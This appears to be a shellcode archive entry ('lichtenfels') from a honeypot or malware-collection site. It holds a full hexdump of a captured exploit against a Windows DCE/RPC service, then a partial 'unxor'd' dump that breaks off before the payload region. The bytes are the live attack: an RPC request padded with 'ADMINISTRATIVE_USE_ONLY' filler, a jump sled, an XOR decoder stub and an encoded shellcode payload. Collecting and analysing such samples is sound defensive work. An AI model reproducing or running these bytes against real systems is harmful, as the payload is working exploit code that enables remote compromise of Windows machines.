lichtenfels Shellcode

file csni:shellcodes:lichtenfels:lichtenfels.bin

Shellcode

raw

hexdump

00000000: 05 00 00 03 10 00 00 00 - 88 0b 00 00 e5 00 00 00   ........ ........
00000010: 70 0b 00 00 01 00 04 00 - 05 00 06 00 01 00 00 00   p....... ........
00000020: 00 00 00 00 32 24 58 fd - cc 45 64 49 b0 70 dd ae   ....2.X. .EdI.p..
00000030: 74 2c 96 d2 60 5e 0d 00 - 01 00 00 00 00 00 00 00   t....... ........
00000040: 70 5e 0d 00 02 00 00 00 - 7c 5e 0d 00 00 00 00 00   p....... ........
00000050: 10 00 00 00 80 96 f1 f1 - 2a 4d ce 11 a6 6a 00 20   ........ .M...j..
00000060: af 6e 72 f4 0c 00 00 00 - 52 4f 4f 54 01 00 00 00   .nr..... ROOT....
00000070: 00 00 00 00 0d f0 ad ba - 00 00 00 00 a8 f4 0b 00   ........ ........
00000080: 00 0b 00 00 00 0b 00 00 - 52 4f 4f 54 04 00 00 00   ........ ROOT....
00000090: a2 01 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46   ........ .......F
000000a0: 38 03 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46   8....... .......F
000000b0: 00 00 00 00 d0 0a 00 00 - c8 0a 00 00 00 00 00 00   ........ ........
000000c0: 01 10 08 00 cc cc cc cc - c8 00 00 00 52 4f 4f 54   ........ ....ROOT
000000d0: c8 0a 00 00 d8 00 00 00 - 00 00 00 00 02 00 00 00   ........ ........
000000e0: 07 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000000f0: 00 00 00 00 c4 28 cd 00 - 64 29 cd 00 00 00 00 00   ........ d.......
00000100: 07 00 00 00 b9 01 00 00 - 00 00 00 00 c0 00 00 00   ........ ........
00000110: 00 00 00 46 ab 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000120: 00 00 00 46 a5 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000130: 00 00 00 46 a6 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000140: 00 00 00 46 a4 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000150: 00 00 00 46 ad 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000160: 00 00 00 46 aa 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000170: 00 00 00 46 07 00 00 00 - 60 00 00 00 58 00 00 00   ...F.... ....X...
00000180: 90 00 00 00 40 00 00 00 - 20 00 00 00 18 08 00 00   ........ ........
00000190: 30 00 00 00 01 00 00 00 - 01 10 08 00 cc cc cc cc   0....... ........
000001a0: 50 00 00 00 4f b6 88 20 - ff ff ff ff 00 00 00 00   P...O... ........
000001b0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001c0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001e0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001f0: 00 00 00 00 00 00 00 00 - 01 10 08 00 cc cc cc cc   ........ ........
00000200: 48 00 00 00 07 00 66 00 - 06 09 02 00 00 00 00 00   H.....f. ........
00000210: c0 00 00 00 00 00 00 46 - 10 00 00 00 00 00 00 00   .......F ........
00000220: 00 00 00 00 01 00 00 00 - 00 00 00 00 78 19 0c 00   ........ ....x...
00000230: 58 00 00 00 05 00 06 00 - 01 00 00 00 70 d8 98 93   X....... ....p...
00000240: 98 4f d2 11 a9 3d be 57 - b2 00 00 00 32 00 31 00   .O.....W ....2.1.
00000250: 01 10 08 00 cc cc cc cc - 80 00 00 00 0d f0 ad ba   ........ ........
00000260: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
00000270: 18 43 14 00 00 00 00 00 - 60 00 00 00 60 00 00 00   .C...... ........
00000280: 52 4f 4f 54 04 00 00 00 - c0 01 00 00 00 00 00 00   ROOT.... ........
00000290: c0 00 00 00 00 00 00 46 - 3b 03 00 00 00 00 00 00   .......F ........
000002a0: c0 00 00 00 00 00 00 46 - 00 00 00 00 30 00 00 00   .......F ....0...
000002b0: 01 00 01 00 81 c5 17 03 - 80 0e e9 4a 99 99 f1 8a   ........ ...J....
000002c0: 50 6f 7a 85 02 00 00 00 - 00 00 00 00 00 00 00 00   Poz..... ........
000002d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 01 00 00 00   ........ ........
000002e0: 01 10 08 00 cc cc cc cc - 30 00 00 00 78 00 6e 00   ........ 0...x.n.
000002f0: 00 00 00 00 d8 da 0d 00 - 00 00 00 00 00 00 00 00   ........ ........
00000300: 20 2f 0c 00 00 00 00 00 - 00 00 00 00 03 00 00 00   ........ ........
00000310: 00 00 00 00 03 00 00 00 - 46 00 58 00 00 00 00 00   ........ F.X.....
00000320: 01 10 08 00 cc cc cc cc - 10 00 00 00 30 00 2e 00   ........ ....0...
00000330: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
00000340: 01 10 08 00 cc cc cc cc - 68 00 00 00 0e 00 ff ff   ........ h.......
00000350: 68 8b 0b 00 02 00 00 00 - 00 00 00 00 00 00 00 00   h....... ........
00000360: f6 03 00 00 00 00 00 00 - f6 03 00 00 5c 00 5c 00   ........ ........
00000370: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000380: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000390: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000003a0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000003b0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000003c0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000003d0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000003e0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000003f0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000400: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000410: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000420: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000430: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000440: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000450: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000460: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000470: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000480: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000490: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000004a0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000004b0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000004c0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000004d0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000004e0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000004f0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000500: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000510: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000520: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000530: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000540: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000550: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000560: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000570: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000580: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000590: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000005a0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000005b0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000005c0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000005d0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000005e0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000005f0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000600: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000610: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000620: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000630: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000640: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000650: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000660: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000670: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000680: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000690: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000006a0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000006b0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000006c0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000006d0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000006e0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000006f0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000700: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000710: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000720: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000730: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000740: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000750: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000760: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000770: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000780: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000790: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000007a0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000007b0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000007c0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000007d0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000007e0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000007f0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000800: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000810: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000820: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000830: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000840: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000850: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000860: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000870: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000880: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000890: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000008a0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000008b0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000008c0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000008d0: eb 7e eb 7c 7e 15 00 01 - eb 76 eb 74 7e 15 00 01   ........ .v.t....
000008e0: eb 6e eb 6c 7e 15 00 01 - eb 66 eb 64 7e 15 00 01   .n.l.... .f.d....
000008f0: eb 5e eb 5c 7e 15 00 01 - eb 56 eb 54 7e 15 00 01   ........ .V.T....
00000900: eb 4e eb 4c 7e 15 00 01 - eb 46 eb 44 7e 15 00 01   .N.L.... .F.D....
00000910: eb 3e eb 3c 7e 15 00 01 - eb 36 eb 34 7e 15 00 01   ........ .6.4....
00000920: eb 2e eb 2c 7e 15 00 01 - eb 26 eb 24 7e 15 00 01   ........ ........
00000930: eb 1e eb 1c 7e 15 00 01 - eb 16 eb 14 7e 15 00 01   ........ ........
00000940: eb 0e eb 0c 7e 15 00 01 - eb 06 eb 04 7e 15 00 01   ........ ........
00000950: eb 02 eb 05 e8 f9 ff ff - ff 58 83 c0 1b 8d a0 01   ........ .X......
00000960: fc ff ff 83 e4 fc 8b ec - 33 c9 66 b9 a2 01 80 30   ........ 3.f....0
00000970: 93 40 e2 fa 7b e4 93 93 - 93 d4 f6 e7 c3 e1 fc f0   ........ ........
00000980: d2 f7 f7 e1 f6 e0 e0 93 - df fc f2 f7 df fa f1 e1   ........ ........
00000990: f2 e1 ea d2 93 d0 e1 f6 - f2 e7 f6 c3 e1 fc f0 f6   ........ ........
000009a0: e0 e0 d2 93 d0 ff fc e0 - f6 db f2 fd f7 ff f6 93   ........ ........
000009b0: d6 eb fa e7 c7 fb e1 f6 - f2 f7 93 e4 e0 a1 cc a0   ........ ........
000009c0: a1 93 c4 c0 d2 c0 e7 f2 - e1 e7 e6 e3 93 c4 c0 d2   ........ ........
000009d0: c0 fc f0 f8 f6 e7 d2 93 - f0 ff fc e0 f6 e0 fc f0   ........ ........
000009e0: f8 f6 e7 93 f0 fc fd fd - f6 f0 e7 93 f0 fe f7 93   ........ ........
000009f0: c9 2b 9f 63 6e ec 18 93 - 18 e3 8f 3e 18 d3 9b 18   ...cn... ........
00000a00: 4b 18 e0 af 90 60 18 e5 - eb 90 60 18 ed b3 90 68   K....... .......h
00000a10: 18 dd 87 a0 7e c5 c4 c2 - 18 ac 90 68 18 61 f9 9d   ........ ...h.a..
00000a20: ca 60 35 e7 9b ca cc 10 - 54 97 d6 71 7a ca cc cd   ..5..... T..qz...
00000a30: 18 5e 18 d5 b7 90 50 42 - 72 90 52 a0 5a f5 18 9b   ......PB r.R.Z...
00000a40: 18 d5 8f 90 50 52 72 91 - 90 52 18 93 90 50 18 69   ....PRr. .R...P.i
00000a50: 18 64 10 55 9d 18 43 f9 - 97 ca 18 64 18 7f 7b 08   .d.U..C. ...d....
00000a60: 93 93 93 10 55 98 c1 c5 - 6c c4 63 c9 18 4b a0 5a   ....U... l.c..K.Z
00000a70: 22 97 7b 14 93 93 93 10 - 55 9b c6 fb 92 92 93 93   ........ U.......
00000a80: 6c c4 63 16 53 e6 e0 c3 - c3 c3 c3 d3 c3 d3 c3 6c   l.c.S... .......l
00000a90: c4 67 10 6b 6c e7 f0 18 - 4b f5 54 d6 93 91 93 f5   .g.kl... K.T.....
00000aa0: 54 d6 91 94 ec 54 d6 97 - 4a 09 fd 75 f9 83 c6 c0   T....T.. J..u....
00000ab0: 6c c4 6f 16 53 e6 d0 a0 - 5a 22 82 c4 18 6e 60 38   l.o.S... Z....n.8
00000ac0: cc 54 d6 93 d7 93 93 93 - 1a ce af 1a ce ab 1a ce   .T...... ........
00000ad0: d3 54 d6 bf 92 92 93 93 - 1e d6 d7 c3 c6 c2 c2 c2   .T...... ........
00000ae0: d2 c2 da c2 c2 c5 c2 6c - c4 77 6c e6 d7 6c c4 7b   .......l .wl..l..
00000af0: 6c e6 db 6c c4 7b c0 6c - c4 6b c3 6c c4 7f 19 95   l..l...l .k.l....
00000b00: d5 17 53 e6 6a c2 c1 c5 - c0 6c 41 c9 ca 1a 94 d4   ..S.j... .lA.....
00000b10: d4 d4 d4 71 7a 50 90 90 - 90 90 90 00 5c 00 43 00   ...qzP.. ......C.
00000b20: 24 00 5c 00 31 00 32 00 - 33 00 34 00 35 00 36 00   ....1.2. 3.4.5.6.
00000b30: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 31 00   1.1.1.1. 1.1.1.1.
00000b40: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 2e 00   1.1.1.1. 1.1.1...
00000b50: 64 00 6f 00 63 00 00 00 - 01 10 08 00 cc cc cc cc   d.o.c... ........
00000b60: 20 00 00 00 30 00 2d 00 - 00 00 00 00 88 2a 0c 00   ....0... ........
00000b70: 02 00 00 00 01 00 00 00 - 28 8c 0c 00 01 00 00 00   ........ ........
00000b80: 07 00 00 00 00 00 00 00 - 00                        ........ .

unxor'd

00000000: 05 00 00 03 10 00 00 00 - 88 0b 00 00 e5 00 00 00   ........ ........
00000010: 70 0b 00 00 01 00 04 00 - 05 00 06 00 01 00 00 00   p....... ........
00000020: 00 00 00 00 32 24 58 fd - cc 45 64 49 b0 70 dd ae   ....2.X. .EdI.p..
00000030: 74 2c 96 d2 60 5e 0d 00 - 01 00 00 00 00 00 00 00   t....... ........
00000040: 70 5e 0d 00 02 00 00 00 - 7c 5e 0d 00 00 00 00 00   p....... ........
00000050: 10 00 00 00 80 96 f1 f1 - 2a 4d ce 11 a6 6a 00 20   ........ .M...j..
00000060: af 6e 72 f4 0c 00 00 00 - 52 4f 4f 54 01 00 00 00   .nr..... ROOT....
00000070: 00 00 00 00 0d f0 ad ba - 00 00 00 00 a8 f4 0b 00   ........ ........
00000080: 00 0b 00 00 00 0b 00 00 - 52 4f 4f 54 04 00 00 00   ........ ROOT....
00000090: a2 01 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46   ........ .......F
000000a0: 38 03 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46   8....... .......F
000000b0: 00 00 00 00 d0 0a 00 00 - c8 0a 00 00 00 00 00 00   ........ ........
000000c0: 01 10 08 00 cc cc cc cc - c8 00 00 00 52 4f 4f 54   ........ ....ROOT
000000d0: c8 0a 00 00 d8 00 00 00 - 00 00 00 00 02 00 00 00   ........ ........
000000e0: 07 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000000f0: 00 00 00 00 c4 28 cd 00 - 64 29 cd 00 00 00 00 00   ........ d.......
00000100: 07 00 00 00 b9 01 00 00 - 00 00 00 00 c0 00 00 00   ........ ........
00000110: 00 00 00 46 ab 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000120: 00 00 00 46 a5 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000130: 00 00 00 46 a6 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000140: 00 00 00 46 a4 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000150: 00 00 00 46 ad 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000160: 00 00 00 46 aa 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000170: 00 00 00 46 07 00 00 00 - 60 00 00 00 58 00 00 00   ...F.... ....X...
00000180: 90 00 00 00 40 00 00 00 - 20 00 00 00 18 08 00 00   ........ ........
00000190: 30 00 00 00 01 00 00 00 - 01 10 08 00 cc cc cc cc   0....... ........
000001a0: 50 00 00 00 4f b6 88 20 - ff ff ff ff 00 00 00 00   P...O... ........
000001b0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001c0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001e0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001f0: 00 00 00 00 00 00 00 00 - 01 10 08 00 cc cc cc cc   ........ ........
00000200: 48 00 00 00 07 00 66 00 - 06 09 02 00 00 00 00 00   H.....f. ........
00000210: c0 00 00 00 00 00 00 46 - 10 00 00 00 00 00 00 00   .......F ........
00000220: 00 00 00 00 01 00 00 00 - 00 00 00 00 78 19 0c 00   ........ ....x...
00000230: 58 00 00 00 05 00 06 00 - 01 00 00 00 70 d8 98 93   X....... ....p...
00000240: 98 4f d2 11 a9 3d be 57 - b2 00 00 00 32 00 31 00   .O.....W ....2.1.
00000250: 01 10 08 00 cc cc cc cc - 80 00 00 00 0d f0 ad ba   ........ ........
00000260: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
00000270: 18 43 14 00 00 00 00 00 - 60 00 00 00 60 00 00 00   .C...... ........
00000280: 52 4f 4f 54 04 00 00 00 - c0 01 00 00 00 00 00 00   ROOT.... ........
00000290: c0 00 00 00 00 00 00 46 - 3b 03 00 00 00 00 00 00   .......F ........
000002a0: c0 00 00 00 00 00 00 46 - 00 00 00 00 30 00 00 00   .......F ....0...
000002b0: 01 00 01 00 81 c5 17 03 - 80 0e e9 4a 99 99 f1 8a   ........ ...J....
000002c0: 50 6f 7a 85 02 00 00 00 - 00 00 00 00 00 00 00 00   Poz..... ........
000002d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 01 00 00 00   ........ ........
000002e0: 01 10 08 00 cc cc cc cc - 30 00 00 00 78 00 6e 00   ........ 0...x.n.
000002f0: 00 00 00 00 d8 da 0d 00 - 00 00 00 00 00 00 00 00   ........ ........
00000300: 20 2f 0c 00 00 00 00 00 - 00 00 00 00 03 00 00 00   ........ ........
00000310: 00 00 00 00 03 00 00 00 - 46 00 58 00 00 00 00 00   ........ F.X.....
00000320: 01 10 08 00 cc cc cc cc - 10 00 00 00 30 00 2e 00   ........ ....0...
00000330: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
00000340: 01 10 08 00 cc cc cc cc - 68 00 00 00 0e 00 ff ff   ........ h.......
00000350: 68 8b 0b 00 02 00 00 00 - 00 00 00 00 00 00 00 00   h....... ........
00000360: f6 03 00 00 00 00 00 00 - f6 03 00 00 5c 00 5c 00   ........ ........
00000370: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000380: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000390: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000003a0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000003b0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000003c0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000003d0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000003e0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000003f0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000400: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000410: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000420: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000430: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000440: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000450: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000460: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000470: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000480: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000490: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000004a0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000004b0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000004c0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000004d0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000004e0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000004f0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000500: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000510: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000520: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000530: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000540: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000550: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000560: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
00000570: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
00000580: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
00000590: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000005a0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
000005b0: 41 00 44 00 4d 00 49 00 - 4e 00 49 00 53 00 54 00   A.D.M.I. N.I.S.T.
000005c0: 52 00 41 00 54 00 49 00 - 56 00 45 00 5f 00 55 00   R.A.T.I. V.E...U.
000005d0: 53 00 45 00 5f 00 4f 00 - 4e 00 4c 00 59 00 5f 00   S.E...O. N.L.Y...
